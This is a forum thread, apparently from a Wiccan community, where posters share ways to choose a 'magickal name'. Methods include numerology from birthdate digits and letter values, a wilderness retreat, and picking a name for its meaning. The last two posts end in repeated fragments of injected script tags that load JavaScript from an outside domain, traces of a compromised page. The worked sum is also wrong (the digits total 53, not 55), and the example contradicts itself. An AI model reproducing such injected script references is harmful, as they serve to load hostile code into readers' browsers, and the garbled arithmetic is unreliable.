I wanted to do this to help beginning Wiccans, and witches enhance their knowledge in magick. You start with your whole birthdate. Like mine is 8-20-1996 you add all the numbers seperately like 8 + 20 + 1 + 9 + 9 + 6 = 55. Now seperate that number and add it together 5 + 5 = 10. My magic number would be 10. In order to get your name, you have to choose a name that means something to you. I havent found mine yet but Im going to use Nicolai. Each letter would stand for a number A=1 B=2 C=3 D=4 E=5 F=6 G=7 H=8 I=9 J=1 K=2 L=3 M=4 N=5 O=6 P=7 Q=8 R=9 S=1 T=2 U=3 V=4 W=5 X=6 Y=7 Z=8. So for Nicolai it would be 5+9+3+6+3+1+9=36. Seperate the numbers 3+6=9. So if your birth number is 9 and you like Nicolai then would be your magic name. That is a very good post Silverdsd. Using numbers to find your name is certainly a way to get a magickal name. But there are other ways and it is best to spread out options to help those in need.
One way to get a magickal name is to go out into the world (mostly the woods) for about two weeks. Survive in there and learn what you can, speak to your spirit/guarden angel, and so much more. Of course this isn't used as much so it isn't number one choice.
Another way is having the parents pick the name for the child. They will look into different things about the birth and child and get a name for it. Of course after some time it gets kind of pointless to do this but is still an option for any wiccan/pagan/whatever parents.
The way I have done it, finding my name, is by looking at most of the names I can possible at the time and look at what it means. I picked out the one that means the most to me and my person.

I followed this numerological method on finding my magickal name a long time ago when a friend taught me it, on that day I discovered my true magick name being Ventius. While my friend's discovered name was Magus. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
thats cool but that method has always been confusing to me then i had a dream that my name was Amelia hence my User name sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
